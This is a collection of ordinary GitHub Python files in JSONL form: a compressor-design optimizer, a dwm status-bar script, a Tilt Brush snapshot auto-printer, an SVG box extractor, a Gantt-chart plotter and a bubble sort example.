print(url)\n bs = get_page(url)\n if bs is not None:\n getattr(self, '_parse_'+page)(bs)\n\ndef load_schools(cache=False):\n account = get_page('https://www.niche.com/account/', cache)\n if not account:\n return None\n school_urls = [s.a.attrs['href'] for s in account.find_all('span', class_='postcard__title') if s.a]\n nschools = len(school_urls)\n print(f\"Found {nschools} schools to load from Niche account.\")\n return [School(u) for u in school_urls]\n\ndef rotated_rows_iter(schools):\n prefix=['', '']\n cathead = [''] *(len(schools)+1)\n def rotated_row(name):\n row = [s.row.get(name, '') for s in schools]\n row[0:0] = prefix\n return row\n for cat, vals in BREAKDOWN.items():\n yield [cat,] + cathead\n for name in vals:\n prefix[1] = name\n yield rotated_row(name)\n","repo_name":"dougn/niche_scraper","sub_path":"niche_scraper/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":10293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13552060192","text":"import numpy as np\r\nimport pandas\r\nimport numpy\r\nfrom . import mean_radius_calculation\r\nfrom . import engine_logging\r\nimport os.path\r\n\r\n\r\ndef get_parabolic_shape_function(x1, x2, x_max, y1, y2, y_max):\r\n LHS_matrix = [[x1**2, x1, 1, 0, 0, 0],\r\n [0, 0, 0, x2**2, x2, 1],\r\n [2 * x_max, 1, 0, 0, 0, 0],\r\n [0, 0, 0, 2 * x_max, 1, 0],\r\n [x_max**2, x_max, 1, 0, 0, 0],\r\n [0, 0, 0, x_max**2, x_max, 1]]\r\n RHS_column = [y1, y2, 0, 0, y_max, y_max]\r\n\r\n result_column = numpy.linalg.solve(LHS_matrix, RHS_column)\r\n left_coef_column = result_column[:3]\r\n right_coef_column = result_column[3:]\r\n\r\n def shape_function(x):\r\n mononom_vector = [x**2, x, 1]\r\n if x <= x_max:\r\n return sum([coef * mononom for coef, mononom in zip(left_coef_column, mononom_vector)])\r\n else:\r\n return sum([coef * mononom for coef, mononom in zip(right_coef_column, mononom_vector)])\r\n\r\n return shape_function\r\n\r\n\r\nclass MeanRadiusCompressorOptimizer:\r\n def __init__(self, compressor_prototype, pi_c, min_eta_ad, precision=0.05):\r\n self.compressor = compressor_prototype\r\n self.non_linear_func_gen = get_parabolic_shape_function\r\n self.compressor_solver = mean_radius_calculation.MeanRadiusCompressorSolver()\r\n self.pi_c = pi_c\r\n self.min_eta_ad = min_eta_ad\r\n self.precision = precision\r\n\r\n self.u_out_1 = list()\r\n self.d_rel_1 = list()\r\n\r\n self.H_t_rel_first = list()\r\n self.H_t_rel_last = list()\r\n self.H_t_rel_max = list()\r\n self.H_t_rel_max_coord = list()\r\n\r\n self.eta_ad_first = list()\r\n self.eta_ad_last = list()\r\n self.eta_ad_max = list()\r\n self.eta_ad_max_coord = list()\r\n\r\n self.c_a_rel_first = list()\r\n self.c_a_rel_last = list()\r\n\r\n self.R_mean_first = list()\r\n self.R_mean_last = list()\r\n\r\n self.inlet_alpha = list()\r\n\r\n def get_total_variant_number(self):\r\n result = 1\r\n result *= len(self.u_out_1)\r\n result *= len(self.d_rel_1)\r\n\r\n result *= len(self.H_t_rel_first)\r\n result *= len(self.H_t_rel_last)\r\n result *= len(self.H_t_rel_max)\r\n result *= len(self.H_t_rel_max_coord)\r\n\r\n result *= len(self.eta_ad_first)\r\n result *= len(self.eta_ad_last)\r\n result *= len(self.eta_ad_max)\r\n result *= len(self.eta_ad_max_coord)\r\n\r\n result *= len(self.c_a_rel_first)\r\n result *= len(self.c_a_rel_last)\r\n\r\n result *= len(self.R_mean_first)\r\n result *= len(self.R_mean_last)\r\n\r\n #result *= len(self.inlet_alpha) TODO Разобраться, как раньше проводилась инициализация\r\n\r\n return result\r\n\r\n def _is_fully_initialized(self):\r\n return self.get_total_variant_number() > 0\r\n\r\n @staticmethod\r\n def _get_non_linear_parameter_value_list(parameter_func_gen, parameter_first, parameter_last, parameter_max, stage_num,\r\n parameter_max_coord):\r\n parameter_function = parameter_func_gen(1, stage_num, parameter_max_coord,\r\n parameter_first, parameter_last, parameter_max)\r\n\r\n parameter_value_list = [parameter_function(stage_ind) for stage_ind in range(1, stage_num + 1)]\r\n return parameter_value_list\r\n\r\n @staticmethod\r\n def _get_linear_parameter_list(parameter_first, parameter_last, stage_num):\r\n return np.linspace(parameter_first, parameter_last, stage_num)\r\n\r\n @staticmethod\r\n def _get_H_t_rel_list(H_t_rel_func_gen, H_t_rel_first, H_t_rel_last, H_t_rel_max, stage_num, H_t_rel_max_coord):\r\n return MeanRadiusCompressorOptimizer._get_non_linear_parameter_value_list(H_t_rel_func_gen, H_t_rel_first, H_t_rel_last,\r\n H_t_rel_max, stage_num, H_t_rel_max_coord)\r\n\r\n @staticmethod\r\n def _get_eta_ad_list(eta_ad_func_gen, eta_ad_first, eta_ad_last, eta_ad_max, stage_num, eta_ad_max_coord):\r\n return MeanRadiusCompressorOptimizer._get_non_linear_parameter_value_list(eta_ad_func_gen, eta_ad_first, eta_ad_last,\r\n eta_ad_max, stage_num, eta_ad_max_coord)\r\n\r\n @staticmethod\r\n def _get_c_a_rel_list(c_a_rel_first, c_a_rel_last, stage_num):\r\n return MeanRadiusCompressorOptimizer._get_linear_parameter_list(c_a_rel_first, c_a_rel_last, stage_num)\r\n\r\n @staticmethod\r\n def _get_R_mean_list(R_mean_first, R_mean_last, stage_num):\r\n return MeanRadiusCompressorOptimizer._get_linear_parameter_list(R_mean_first, R_mean_last, stage_num)\r\n\r\n def _get_compressor_model(self, u_out_1, d_rel_1, H_t_rel_first, H_t_rel_last, H_t_rel_max, H_t_rel_max_coord,\r\n eta_ad_first, eta_ad_last, eta_ad_max, eta_ad_max_coord, c_a_rel_first, c_a_rel_last,\r\n R_mean_first, R_mean_last, inlet_alpha):\r\n compressor_copy = self.compressor.get_incomplete_copy()\r\n stage_num = len(compressor_copy.stage_class_list)\r\n\r\n H_t_rel_list = self._get_H_t_rel_list(self.non_linear_func_gen, H_t_rel_first, H_t_rel_last, H_t_rel_max,\r\n stage_num, H_t_rel_max_coord)\r\n eta_ad_list = self._get_eta_ad_list(self.non_linear_func_gen, eta_ad_first, eta_ad_last, eta_ad_max, stage_num,\r\n eta_ad_max_coord)\r\n c_a_rel_list = self._get_c_a_rel_list(c_a_rel_first, c_a_rel_last, stage_num)\r\n R_mean_list = self._get_R_mean_list(R_mean_first, R_mean_last, stage_num)\r\n\r\n compressor_copy.first_stage.u_out_1 = u_out_1\r\n compressor_copy.first_stage.d_rel_1 = d_rel_1\r\n compressor_copy.H_t_rel_list = H_t_rel_list\r\n compressor_copy.eta_ad_list = eta_ad_list\r\n compressor_copy.c_a_rel_list = c_a_rel_list\r\n compressor_copy.R_mean_list = R_mean_list\r\n compressor_copy.rotor_velocity_law_list = self.compressor.rotor_velocity_law_list\r\n compressor_copy.stator_velocity_law_list = self.compressor.stator_velocity_law_list\r\n compressor_copy.inlet_alpha = inlet_alpha\r\n\r\n return compressor_copy\r\n\r\n def _get_index(self):\r\n iterable_list = list()\r\n name_list = list()\r\n\r\n iterable_list.append(self.u_out_1)\r\n name_list.append('u_out_1')\r\n iterable_list.append(self.d_rel_1)\r\n name_list.append('d_rel_1')\r\n\r\n iterable_list.append(self.H_t_rel_first)\r\n name_list.append('H_t_rel_first')\r\n iterable_list.append(self.H_t_rel_last)\r\n name_list.append('H_t_rel_last')\r\n iterable_list.append(self.H_t_rel_max)\r\n name_list.append('H_t_rel_max')\r\n iterable_list.append(self.H_t_rel_max_coord)\r\n name_list.append('H_t_rel_max_coord')\r\n\r\n iterable_list.append(self.eta_ad_first)\r\n name_list.append('eta_ad_first')\r\n iterable_list.append(self.eta_ad_last)\r\n name_list.append('eta_ad_last')\r\n iterable_list.append(self.eta_ad_max)\r\n name_list.append('eta_ad_max')\r\n iterable_list.append(self.eta_ad_max_coord)\r\n name_list.append('eta_ad_max_coord')\r\n\r\n iterable_list.append(self.c_a_rel_first)\r\n name_list.append('c_a_rel_first')\r\n iterable_list.append(self.c_a_rel_last)\r\n name_list.append('c_a_rel_last')\r\n\r\n iterable_list.append(self.R_mean_first)\r\n name_list.append('R_mean_first')\r\n iterable_list.append(self.R_mean_last)\r\n name_list.append('R_mean_last')\r\n iterable_list.append(self.inlet_alpha)\r\n name_list.append('inlet_alpha')\r\n\r\n index = pandas.MultiIndex.from_product(iterable_list, names=name_list)\r\n\r\n return index\r\n\r\n def _is_valid_pi_c(self, pi_c):\r\n residual = abs((pi_c - self.pi_c)) / self.pi_c\r\n return (residual < self.precision) and (pi_c >= self.pi_c)\r\n\r\n def _is_valid_pi_c_trend(self, compressor):\r\n pi_c = 1e10\r\n\r\n for stage in compressor.stages:\r\n if stage.thermal_info.pi_stag > pi_c:\r\n return False\r\n else:\r\n pi_c = stage.thermal_info.pi_stag\r\n\r\n return True\r\n\r\n def _is_valid_eta_ad(self, eta_ad):\r\n return eta_ad >= self.min_eta_ad\r\n\r\n @staticmethod\r\n def _get_compressor_info(index, names):\r\n result = dict(zip(names, index))\r\n\r\n return result\r\n\r\n @staticmethod\r\n def _get_compressor_variants_info(compressor_list, valid_index_list, parameter_names):\r\n variant_dicts = [MeanRadiusCompressorOptimizer._get_compressor_info(index, parameter_names)\r\n for index in valid_index_list]\r\n\r\n for variant_dict, compressor in zip(variant_dicts, compressor_list):\r\n variant_dict['pi_c'] = compressor.pi_stag_compressor()\r\n variant_dict['eta_ad'] = compressor.eta_ad_compressor()\r\n variant_dict['inlet_alpha'] = np.rad2deg(compressor.inlet_alpha)\r\n\r\n if not variant_dicts:\r\n return 'Solution not found'\r\n\r\n info_frame = pandas.DataFrame.from_records(variant_dicts)\r\n info_frame = info_frame[['pi_c', 'eta_ad'] + parameter_names]\r\n\r\n return info_frame\r\n\r\n def _get_validator(self, frequency=1000):\r\n optimizer = self\r\n\r\n class Validator:\r\n def __init__(self, frequency):\r\n self.frequency = frequency\r\n self.optimizer = optimizer\r\n self.processed_num = 0\r\n self.valid_num = 0\r\n self.quasi_valid_num = 0\r\n self.total_num = optimizer.get_total_variant_number()\r\n self.start_time = None\r\n\r\n self.max_eta = 0\r\n self.max_pi_c = 0\r\n self.min_eta = 1e10\r\n self.min_pi_c = 1e10\r\n\r\n self.logger = engine_logging.CompressorSearchInfo(compressor_validator=self)\r\n\r\n def validate(self, compressor):\r\n if not self.logger.started:\r\n self.logger.start()\r\n\r\n pi_c = compressor.pi_stag_compressor()\r\n eta_ad = compressor.eta_ad_compressor()\r\n\r\n if pi_c > self.max_pi_c:\r\n self.max_pi_c = pi_c\r\n if eta_ad > self.max_eta:\r\n self.max_eta = eta_ad\r\n if pi_c < self.min_pi_c:\r\n self.min_pi_c = pi_c\r\n if eta_ad < self.min_eta:\r\n self.min_eta = eta_ad\r\n\r\n self.processed_num += 1\r\n if self.optimizer._is_valid_pi_c(pi_c) and self.optimizer._is_valid_eta_ad(eta_ad):\r\n self.quasi_valid_num += 1\r\n if self.optimizer._is_valid_pi_c_trend(compressor):\r\n is_valid = True\r\n self.valid_num += 1\r\n else:\r\n is_valid = False\r\n else:\r\n is_valid = False\r\n\r\n if self.processed_num % frequency == 0:\r\n self.logger.finish()\r\n\r\n self.max_pi_c = 0\r\n self.max_eta = 0\r\n self.min_eta = 1e10\r\n self.min_pi_c = 1e10\r\n\r\n return is_valid\r\n\r\n return Validator(frequency)\r\n\r\n def get_compressor_df_generator(self, eps=0.01, chunk_size=1000):\r\n assert self._is_fully_initialized(), 'Object is not fully initialized.'\r\n\r\n def extend_compressor_info_df(compressor_info_df, compressor_list):\r\n compressor_info_df['compressor'] = compressor_list\r\n compressor_info_df['D_out_1'] = [compressor.stages[0].D_out_1 for compressor in compressor_list]\r\n\r\n index = self._get_index()\r\n\r\n compressor_list = list()\r\n valid_index_list = list()\r\n\r\n validator = self._get_validator()\r\n\r\n for init_tuple in index:\r\n try:\r\n compressor = self._get_compressor_model(*init_tuple)\r\n\r\n self.compressor_solver.solve(compressor, eps)\r\n\r\n if validator.validate(compressor):\r\n compressor_list.append(compressor)\r\n valid_index_list.append(init_tuple)\r\n\r\n except AssertionError as e:\r\n logger = engine_logging.CaughtErrorsLogger(e)\r\n logger.log()\r\n continue\r\n\r\n if len(valid_index_list) == chunk_size:\r\n compressor_variant_info = self._get_compressor_variants_info(compressor_list,\r\n valid_index_list, index.names)\r\n extend_compressor_info_df(compressor_variant_info, compressor_list)\r\n\r\n yield compressor_variant_info\r\n\r\n valid_index_list = list()\r\n compressor_list = list()\r\n\r\n if len(valid_index_list) > 0:\r\n compressor_variant_info = self._get_compressor_variants_info(compressor_list,\r\n valid_index_list, index.names)\r\n extend_compressor_info_df(compressor_variant_info, compressor_list)\r\n\r\n yield compressor_variant_info\r\n","repo_name":"Sovianum/compressors-site","sub_path":"gas_dynamics/compressor_engine/compressor_optimizer.py","file_name":"compressor_optimizer.py","file_ext":"py","file_size_in_byte":13447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70484483075","text":"#!/usr/bin/env python3.2\n# py3 !\n# Requires psutil module for memory and cpu usage retrieval:\n# apt-get install python3-pip\n# pip-3 install psutil\n\nimport datetime\nimport os\nimport re\nimport subprocess\nimport urllib.request\nimport xml.dom.minidom\nimport psutil\nimport time\nimport string\n\ndef run_cmd(cmd):\n return subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0].decode(\"utf-8\").strip()\n\n\nclass Segment:\n icons = {\n 'vol_mute': '\\uea30',\n 'vol_low': '\\uea31',\n 'vol_medium': '\\uea32',\n 'vol_high': '\\uea33',\n 'music': '\\uea36',\n 'mail': '\\uea22',\n 'mail_inverted': '\\ueaf6',\n 'date': '\\ueaf7',\n 'time': '\\u0001',\n 'cpu': '\\u1e41',\n 'ram': '\\ueae4',\n 'AC': '\\uea21',\n 'bat_full': '\\uea27',\n 'bat_medium': '\\uea26',\n 'bat_empty': '\\uea25',\n 'bat_charging': '\\uea28',\n 'bat_error': '\\uea24',\n }\n bars = {\n 'round-regular': '\\uead0\\uead1\\uead2\\uead3\\uead4\\uead5\\uead6',\n 'round-candycane': '\\uead0\\uead1\\uead2\\uead7\\uead8\\uead9\\ueada',\n }\n colors = {\n 'normal': '\\x01',\n 'urgent': '\\x03',\n 'error': '\\x04',\n 'white': '\\x07',\n 'warning': '\\x08',\n 'b_txt_y_bg': '\\x09',\n 'y_txt_b_gb': '\\x0C',\n 'blu_txt_b_bg': '\\x0D',\n 'b_txt_blu_bg': '\\x0A',\n 'gry_txt_b_bg': '\\x0E',\n 'b_txt_gry_bg': '\\x0B',\n 'urg_txt_gry_bg': '\\x0F',\n 'org_txt_gry_bg': '\\x10',\n 'None': '',\n }\n\n \n def get_bar(self, percent, length=10, text='', type='round-candycane'):\n bar = []\n fill_length = round(percent / 100 * length)\n\n chars_empty = self.bars[type][0:3]\n chars_filled = self.bars[type][3:7]\n\n if not fill_length:\n # Empty bar\n bar.append(chars_empty[0])\n bar.append(chars_empty[1] * (length - 1))\n bar.append(chars_empty[2])\n elif fill_length == length:\n # Full bar\n bar.append(chars_filled[0])\n bar.append(chars_filled[1] * (length - 1))\n bar.append(chars_filled[2])\n else:\n # Partially filled bar\n bar.append(chars_filled[0])\n bar.append(chars_filled[1] * (fill_length - 1))\n bar.append(chars_filled[3])\n\n bar.append(chars_empty[1] * (length - fill_length - 1))\n bar.append(chars_empty[2])\n\n bar = ''.join(bar)\n\n return bar + '\\u0002' + text\n #return bar #+'\\u0002'\n\n def set_icon(self, icon, color='None'):\n\n if icon == None:\n self._icon = ''\n else:\n self._icon = self.colors.get(color) + self.icons.get(icon) + '\\u00a0'\n\n\n def set_text(self, text, color='None'):\n if text == None:\n self._text = ''\n else:\n self._text = self.colors.get(color) + text #+ self.colors.get('normal')\n\n\n\nclass Music(Segment):\n trim_length = 30\n \n def __str__(self):\n return str(self._icon + self._text)\n \n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon('music', 'b_txt_y_bg')\n self.set_text('Not playing', 'b_txt_y_bg')\n\n try:\n cmd = run_cmd(['timeout', '1s', 'mpc'])\n except OSError:\n return\n\n if 'playing' in cmd:\n text = []\n\n [playing, info, dummy] = cmd.split('\\n')\n percent = int(re.search('(\\d+)%', info).group(1))\n\n if len(playing) > self.trim_length:\n playing = playing[:self.trim_length] + '...'\n\n (current, total) = re.findall('(\\d+:\\d+)', info)\n\n text.extend([\n playing,\n current + str('/') + total,\n ])\n \n if 'Discharging,' not in bat_stat and 'Charging,' not in bat_stat: # Show progress bar only if there's no bar present for the battery\n text.extend([\n self.get_bar(percent),\n ])\n\n self.set_text(' '.join(text), 'b_txt_y_bg')\n\n\nclass Vol(Segment):\n def __str__(self):\n return str(self._icon + self._text)\n \n def __init__(self):\n Segment.__init__(self)\n\n try:\n cmd = run_cmd(['amixer', 'get', 'Master'])\n except OSError:\n return\n\n try:\n volume = int(re.search('\\[(\\d+)%\\]', cmd).group(1))\n muted = re.search('\\[(on|off)\\]', cmd).group(1) == 'off'\n except AttributeError:\n self.set_icon('vol_mute')\n self.set_text('No sound')\n\n return\n\n if muted:\n self.set_icon('vol_mute', 'b_txt_blu_bg')\n self.set_text(self.get_bar(0))\n return\n\n if volume < 10:\n self.set_icon('vol_low', 'b_txt_blu_bg')\n elif volume > 70:\n self.set_icon('vol_high', 'b_txt_blu_bg')\n else:\n self.set_icon('vol_medium', 'b_txt_blu_bg')\n\n self.set_text(self.get_bar(volume), 'b_txt_blu_bg')\n\nclass MailSegment(Segment):\n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon('mail')\n self.set_text('N/A')\n\n unread = []\n hl = False\n\n try:\n for account in open(os.environ['XDG_CONFIG_HOME'] + '/gmailaccounts', encoding='utf-8'):\n (url, user, passwd) = account.split('|')\n\n auth_handler = urllib.request.HTTPBasicAuthHandler()\n auth_handler.add_password(realm='New mail feed', uri='https://mail.google.com/', user=user, passwd=passwd)\n opener = urllib.request.build_opener(auth_handler)\n urllib.request.install_opener(opener)\n\n request = urllib.request.urlopen(url)\n dom = xml.dom.minidom.parseString(request.read())\n count = dom.getElementsByTagName('fullcount')[0].childNodes[0].data\n\n if int(count) > 0:\n hl = True\n\n unread.append(count)\n except (IOError, ValueError, KeyError):\n return\n\n if hl:\n self.set_icon('mail')\n\n self.set_text(' / '.join(unread))\n\n\nclass Date(Segment):\n def __str__(self):\n return str(self._icon + self._text)\n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon(None, 'b_txt_gry_bg')\n self.set_text(datetime.datetime.now().strftime('%a %d'), 'b_txt_gry_bg')\n\n\nclass Time(Segment):\n def __str__(self):\n return str(self._icon + self._text)\n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon(None, 'white')\n self.set_text(datetime.datetime.now().strftime('%R'), 'white')\n \n \n\nclass Mem(Segment):\n def __str__(self):\n return str(self._icon + self._text)\n \n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon('ram', 'b_txt_blu_bg')\n \n mem=str(round(psutil.phymem_usage()[3]))\n self.set_text(mem + '%', 'b_txt_blu_bg')\n \nclass CPU(Segment):\n def __str__(self):\n return self._icon + self._text\n \n def __init__(self):\n Segment.__init__(self)\n self.set_icon('cpu', 'b_txt_y_bg')\n\n # CPU percentage per core:\n #cpuloads = psutil.cpu_percent(interval=1, percpu=True)\n #cpu1 = str(round(cpuloads[0])) + '%'\n #cpu2 = str(round(cpuloads[1])) + '%'\n #self.set_text(cpu1 + ' | ' + cpu2, 'b_txt_y_bg')\n \n # CPU percentage overall:\n cpuloads = str(round(psutil.cpu_percent(interval=1)))\n if len(cpuloads) == 1:\n cpuloads=' ' + cpuloads\n self.set_text(cpuloads+'%', 'b_txt_y_bg')\n\nclass bat_(Segment):\n # FYI: to simply see whether AC power is connected: cat /sys/class/power_supply/AC/online\n def __str__(self):\n return self._icon + self._text\n \n def __init__(self):\n Segment.__init__(self)\n\n if 'Discharging,' in bat_stat:\n if percentage >= 50:\n colr='b_txt_gry_bg'\n self.set_icon('bat_full', colr)\n elif percentage <= 10:\n colr='urg_txt_gry_bg'\n self.set_icon('bat_empty', colr)\n else:\n colr='org_txt_gry_bg'\n self.set_icon('bat_medium', colr)\n self.set_text(self.get_bar(percentage, 18, '\\x0B '+str(percentage)+'%'), colr)\n elif 'Charging,' in bat_stat:\n colr='b_txt_gry_bg'\n self.set_icon('bat_charging', colr)\n self.set_text(self.get_bar(percentage, 18, '\\x0B '+str(percentage)+'%'), colr)\n #elif 'Unknown,' in bat_stat:\n # colr='urg_txt_gry_bg'\n # self.set_icon('bat_error', colr)\n # self.set_text('Battery status unknown!', colr)\n else:\n self.set_icon('AC', 'b_txt_gry_bg')\n self.set_text('')\n \nclass network(Segment):\n # FYI: to simply see whether AC power is connected: cat /sys/class/power_supply/AC/online\n def __str__(self):\n return self._icon + self._text\n \n def __init__(self):\n Segment.__init__(self)\n \n nw_data=str(psutil.network_io_counters(pernic=True))\n nw_wlan=nw_data[nw_data.find('wlan0'):nw_data.find('eth0')]\n nw_eth=nw_data[nw_data.find('eth0'):]\n \n wlan_sent=nw_wlan[nw_wlan.find('bytes_sent=')+11:nw_wlan.find(', bytes_recv')]\n wlan_recv=nw_wlan[nw_wlan.find('bytes_recv=')+11:nw_wlan.find(', packets_sent')]\n \n wlan_sent_display=round(int(wlan_sent) / 1048576, 1) # translates into MB\n \n if wlan_sent_display < 1.0:\n wlan_sent_display=str(round(int(wlan_sent) / 1024, 1)) + ' KB'\n elif wlan_sent_display > 1024.0:\n wlan_sent_display=str(round(int(wlan_sent) / 1073741824, 2)) + ' GB'\n else:\n wlan_sent_display=str(wlan_sent_display) + ' MB'\n \n \n if 'Discharging,' in bat_stat:\n if percentage >= 50:\n colr='b_txt_gry_bg'\n self.set_icon('bat_full', colr)\n elif percentage <= 10:\n colr='urg_txt_gry_bg'\n self.set_icon('bat_empty', colr)\n else:\n colr='org_txt_gry_bg'\n self.set_icon('bat_medium', colr)\n self.set_text(self.get_bar(percentage, 18, '\\x0B '+str(percentage)+'%'), colr)\n elif 'Charging,' in bat_stat:\n colr='b_txt_gry_bg'\n self.set_icon('bat_charging', colr)\n self.set_text(self.get_bar(percentage, 18, '\\x0B '+str(percentage)+'%'), colr)\n #elif 'Unknown,' in bat_stat:\n # colr='urg_txt_gry_bg'\n # self.set_icon('bat_error', colr)\n # self.set_text('Battery status unknown!', colr)\n else:\n self.set_icon('AC', 'b_txt_gry_bg')\n self.set_text('')\n\n#while 1:\n#def bat_stat():\n''' Returns status of the battery; first arg is -1 for discharging, 1 for charging\nor 0 for AC power, and bat percentage as second arg '''\nbat = run_cmd(['acpi', '-b'])\n\nbat=bat.split(' ')\nper=bat[3]\nbat_stat=bat[2]\n\npercentage=''\n\nfor letter in per:\n if letter not in string.punctuation:\n percentage += letter\npercentage=int(percentage)\n\n\n\nbat = str(bat_())\ncpu = str(CPU())\nmem = str(Mem())\ntime = str(Time())\ndate = str(Date())\nvol = str(Vol())\nmusic = str(Music())\n\n\n\n# tühik: \\u00a0\ncommand=str('xsetroot -name \"'+ '\\x0C\\u1e00' + cpu+ '\\x09\\u1e00\\x0D\\u1e00' + mem+ '\\x0A\\u1e00\\x0E\\u1e00' + bat +\n'\\x0B\\u1e00\\x0C\\u1e00' + music+'\\x09\\u1e00\\x0D\\u1e00'+ vol+'\\x0A\\u1e00\\x0E\\u1e00' + date + '\\x0B\\u1e00\\x07\\u00a0' + time + ' '+'\"')\nos.system(command)\n #time.sleep(1)\n","repo_name":"laur89/dwm-setup","sub_path":".dwm/bars/pybar_old_builds/py_bar_DEPRECATED.py","file_name":"py_bar_DEPRECATED.py","file_ext":"py","file_size_in_byte":11729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26128146374","text":"import win32print\r\nimport win32ui\r\nimport time\r\nimport os\r\nfrom PIL import Image, ImageWin\r\n\r\npath_to_watch = 'C:\\\\Users\\\\amire\\\\OneDrive\\\\Documents\\\\Tilt Brush\\\\Snapshots'\r\n\r\ndef printPhotoFromFilename(file_name):\r\n HORZRES = 8\r\n VERTRES = 10\r\n\r\n file_name = path_to_watch + \"\\\\\" + file_name\r\n\r\n LOGPIXELSX = 88\r\n LOGPIXELSY = 90\r\n\r\n PHYSICALWIDTH = 110\r\n PHYSICALHEIGHT = 111\r\n\r\n PHYSICALOFFSETX = 0\r\n PHYSICALOFFSETY = 0\r\n\r\n printer_name = win32print.GetDefaultPrinter ()\r\n\r\n hDC = win32ui.CreateDC ()\r\n hDC.CreatePrinterDC (printer_name)\r\n printable_area = hDC.GetDeviceCaps (HORZRES), hDC.GetDeviceCaps (VERTRES)\r\n printer_size = hDC.GetDeviceCaps (PHYSICALWIDTH), hDC.GetDeviceCaps (PHYSICALHEIGHT)\r\n printer_margins = hDC.GetDeviceCaps (PHYSICALOFFSETX), hDC.GetDeviceCaps (PHYSICALOFFSETY)\r\n\r\n bmp = Image.open (file_name)\r\n if bmp.size[0] > bmp.size[1]:\r\n bmp = bmp.rotate (0)\r\n watermark = Image.open('ramka.png')\r\n bmp.paste(watermark, (0, 0, 1080, 1920), watermark)\r\n\r\n ratios = [1.2 * printable_area[0] / bmp.size[0], 1.2 * printable_area[1] / bmp.size[1]]\r\n\r\n print(ratios)\r\n scale = min (ratios)\r\n\r\n hDC.StartDoc (file_name)\r\n hDC.StartPage ()\r\n\r\n dib = ImageWin.Dib (bmp)\r\n scaled_width, scaled_height = [int (scale * i) for i in bmp.size]\r\n x1 = int ((printer_size[0] - scaled_width) / 2)\r\n y1 = int ((printer_size[1] - scaled_height) / 2)\r\n x2 = x1 + scaled_width\r\n y2 = y1 + scaled_height\r\n dib.draw (hDC.GetHandleOutput (), (x1, y1, x2, y2))\r\n\r\n hDC.EndPage ()\r\n hDC.EndDoc ()\r\n hDC.DeleteDC ()\r\n\r\nbefore = dict ([(f, None) for f in os.listdir(path_to_watch)])\r\nphoto_time = int(time.time()-100)\r\nprint(before)\r\n\r\nwhile True:\r\n time.sleep(1)\r\n after = dict ([(f, None) for f in os.listdir(path_to_watch)])\r\n added = [f for f in after if not f in before]\r\n if added:\r\n if time.time()-photo_time > 60:\r\n photo_time = time.time()\r\n print(\" drukuje \" + str(added[0]))\r\n printPhotoFromFilename(str(added[0]))\r\n before = after","repo_name":"a-mirecki/TiltBrushAutoPrintingDriver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2407688842","text":"mode = None\n\nlist = []\n\nx = y = w = h = 0\nname = None\n\ndef flush():\n\tglobal x, y, w, h, name\n\tif mode == 'rect':\n\t\tlist.append((x,y,w,h,'box',name))\n\tif mode == 'circle':\n\t\tx = cx - rx\n\t\ty = cy - ry\n\t\tw = rx * 2\n\t\th = ry * 2\n\t\tlist.append((x,y,w,h,'circle',name))\n\tx = y = w = h = 0\n\tname = None\n\nfor line in open(\"boxes.svg\").readlines():\n\tline = line.strip()\n\tif line == \"')\n\tprint('
')\n\tprint('')\n\tfor (x,y,w,h,c,name) in list:\n\t\tx = round(x/4) - 1\n\t\ty = round(y/4) - 1\n\t\tw = round(w/4) + 2\n\t\th = round(h/4) + 2\n\t\tprint(f'
{name}
')\n\tprint('
')\n\n#print_html()\nprint_list()\n","repo_name":"rally-the-troops/nevsky","sub_path":"tools/genboxes.py","file_name":"genboxes.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22769199991","text":"import matplotlib.pyplot as plt\n\ndef display(file, machines):\n f = open(file, 'r')\n\n data = f.read()\n lines = data.split(\"\\n\")\n tr = []\n max_time = 0\n for line in lines:\n tr.append(line.split('_'))\n\n machine_times = []\n for i in range(1, machines):\n machine_times.append([])\n\n for i in range(0, len(tr)):\n if(len(tr[i]) > 4 and tr[i][2] == \"Begin\"):\n max_time = max(max_time, int(tr[i][3]))\n for j in range(i, len(tr)):\n if(tr[i][0] == tr[j][0] and tr[i][0] == tr[j][0] and\n tr[j][2] == \"Finish\"):\n machine_times[int(tr[j][4])].append([tr[i][3], tr[j][3]])\n break\n\n print(machine_times)\n fig, ax = plt.subplots()\n\n n = []\n y = []\n\n for m in range(0, machines - 1):\n n.append('Machine ' + str(m))\n y.append(m*10+5)\n v = []\n for j in range(0, len(machine_times[m])-1):\n s_time = int(machine_times[m][j][0])\n e_time = int(machine_times[m][j][1])\n v.append([s_time, e_time - s_time])\n\n ax.broken_barh(v,[m*10,9])\n\n ax.set_ylim(5, machines*10+5)\n ax.set_xlim(0, max_time+5)\n ax.set_xlabel('seconds since start')\n ax.set_yticks(y)\n ax.set_yticklabels(n)\n ax.grid(True)\n plt.show()","repo_name":"KrzysztofDabek/RAS_AssemblyLine","sub_path":"RAS_AssemblyLine/SimPlot.py","file_name":"SimPlot.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36420904199","text":"#Bubble Sort\n#Nested loop is used \n#For each loop the greatest element moves to the rightmost place\n\ndef bubbleSort(arr):\n for i in range(len(arr) -1):\n for j in range(len(arr) - 1 - i):\n if arr[j] > arr[j+1]:\n arr[j],arr[j+1]=arr[j+1],arr[j]\n print(arr)\n\nmyList=[11,9,7,5,3,2,1]\nbubbleSort(myList)\n\n\n#Time comp => O(N*N)\n#SPace comp => O(1)","repo_name":"Maanu07/dsa_python","sub_path":"Sorting/bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} 